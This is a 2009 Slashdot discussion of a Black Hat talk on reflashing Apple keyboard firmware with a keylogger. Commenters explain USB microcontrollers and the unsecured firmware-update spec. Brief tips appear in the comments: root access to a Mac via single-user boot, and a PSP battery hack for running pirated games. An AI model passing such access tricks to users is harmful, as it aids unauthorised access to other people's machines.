Slashdot is powered by your submissions, so send in your scoop

 


Forgot your password?
Close
typodupeerror
×
Security Businesses Input Devices Apple

Apple Keyboard Firmware Hack Demonstrated 275

Posted by Soulskill from the qwerty's-revenge dept.
Anonymouse writes with this excerpt from SemiAccurate: "Apple keyboards are vulnerable to a hack that puts keyloggers and malware directly into the device's firmware. This could be a serious problem, and now that the presentation and code (PDF) is out there, the bad guys will surely be exploiting it. The vulnerability was discovered by K. Chen, and he gave a talk on it at Black Hat this year (PDF). The concept is simple: a modern Apple keyboard has about 8K of flash memory, and 256 bytes of working RAM. For the intelligent, this is more than enough space to have a field day. ... The new firmware can do anything you want it to. Chen demonstrated code which, when you put in a password and hit return, starts playing back the last five characters typed in, LIFO. It is a rudimentary keylogger; a proof of concept more than anything else. Since there is about 1K of flash free in the keyboard itself, you can log quite a few keystrokes totally transparently."
This discussion has been archived. No new comments can be posted.

Apple Keyboard Firmware Hack Demonstrated More

Apple Keyboard Firmware Hack Demonstrated

Comments Filter:

  • Re:Flash memory in a keyboard? (Score:5, Informative)

    by TheRaven64 ( 641858 ) on Saturday August 01, 2009 @01:36PM (#28910179) Journal
    It's a USB keyboard. That means that it communicates with the host via quite a complex protocol. A keyboard is not just a 'send a specific 8-bit signal when each button is pressed or released' device anymore. The amount of logic needed is not very large, but it's a lot more than a PS/2-style keyboard needed. The firmware could have been in ROM, but these days Flash is about as cheap as ROM and gives you the option of distributing fixes if you find bugs after the device ships.

  • Re:Huh?? (Score:5, Informative)

    by Anonymous Coward on Saturday August 01, 2009 @01:37PM (#28910187)

    Modern peripherals have microcontrollers that are basically tiny computers all on one chip. The have program flash, data registers, and sometimes data flash or eeprom memory. They are basically small computers about a $1.00 a pop, and are generally more affordable than custom silicon for most low-speed applications (i.e. less than 20 MIPS).

  • Re:What's next? (Score:4, Informative)

    by unfunk ( 804468 ) on Saturday August 01, 2009 @01:39PM (#28910201) Journal
    I feel somewhat obliged to point out that the Sony PSP is vulnerable to a battery hack. If you put in a certain battery, you can then downgrade the system's firmware and play pirated games etc

  • Re:Flash memory in a keyboard? (Score:1, Informative)

    by Anonymous Coward on Saturday August 01, 2009 @01:42PM (#28910227)

    I wouldn't be surprised. Modern gaming devices with programmable buttons often store those macros on the device itself, (e.g. the N52te) in order to allow it to work on any computer it's plugged into without needing the extra software - all you need the software for is to program it.

  • Re:Flash memory in a keyboard? (Score:5, Informative)

    by confidential ( 23321 ) on Saturday August 01, 2009 @01:49PM (#28910311)

    The firmware could have been in ROM, but these days Flash is about as cheap as ROM and gives you the option of distributing fixes if you find bugs after the device ships.

    Two such examples of exactly that:

    1. Aluminum Keyboard Firmware Update (desktops) [apple.com]
    2. MacBook, MacBook Pro Keyboard Firmware Update (portables) [apple.com]

    The only news here is that the same mechanism of installing these updates is able to have other third party software installed in their place as well.

  • Re:Doesn't USB have DMA capability? (Score:3, Informative)

    by TheRaven64 ( 641858 ) on Saturday August 01, 2009 @01:52PM (#28910333) Journal
    No, USB DMAs can only be initiated from the host (it's a client-server protocol, remember). A USB device has to trick the driver into starting a DMA, which is probably difficult for a keyboard to do without pretending to be some other kind of device. FireWire, on the other hand, allows one device to initiate a DMA request on another and it is up to the driver to block this.

  • Re:Makes me glad... (Score:3, Informative)

    by alen ( 225700 ) on Saturday August 01, 2009 @01:57PM (#28910397)

    probably a lot of keyboards, but Apple keyboards are probably the largest block of a single identifiable brand out there. everyone probably uses OEM'd logitechs but those are probably customized to each OEM

  • Re:What about other keyboard manufacturers? (Score:5, Informative)

    by Anonymous Coward on Saturday August 01, 2009 @02:36PM (#28910755)

    All USB keyboards are vulnerable. The blame here rests on the USB Device Firmware Update Specification [usb.org], which specifies how firmware updates are supposed to work. Hint: there's no security. The only reason this makes news at all is because it has the word "Apple" in the title.

    Spec compliant, secure: choose one. USB was designed for single user computers without security in mind. The only way to solve this (partially) with existing hardware would be to block access to hardware devices from applications running as non-root users, which is fundamentally contrary to the desire to get device drivers out of the kernel for stability. Short of that, this can only be solved by putting a more powerful CPU in the keyboard controller so that it can do a signature check on its own firmware.

  • Much easier way... (Score:3, Informative)

    by Longjmp ( 632577 ) on Saturday August 01, 2009 @04:37PM (#28911603)
    I only need two keystrokes to hack a Mac when I have access to its keyboard:
    Cmd - "s"
    Voila, root access. documented here :p Start into single user mode [apple.com]

  • Comment removed (Score:5, Informative)

    by account_deleted ( 4530225 ) on Saturday August 01, 2009 @04:38PM (#28911609)
    Comment removed based on user account deletion

  • That's not a bug. (Score:3, Informative)

    by Anonymous Coward on Saturday August 01, 2009 @05:12PM (#28911807)

    That *is* a feature. It isn't a hacked battery, it is a battery which is hacked to appear as an authentic internal tool, designed to read a certain area on a memory stick, so sony can quickly restore a problematic psp.

    It was designed that way, and obscured. the 'hack' merely makes that information public and usable.

  • Re:Huh?? (Score:5, Informative)

    by RalphSleigh ( 899929 ) on Saturday August 01, 2009 @05:25PM (#28911885) Homepage

    No, it's your OS's job to decide what pressing keypad-minus does, the keyboard should simply tell the OS that keypad-minus key was pressed

  • Re:Makes me glad... (Score:1, Informative)

    by Anonymous Coward on Saturday August 01, 2009 @08:37PM (#28913159)

    Because Apple and a couple of Logitech keyboards are the only ones to use flash.

Slashdot Top Deals

Remember, UNIX spelled backwards is XINU. -- Mt.

Close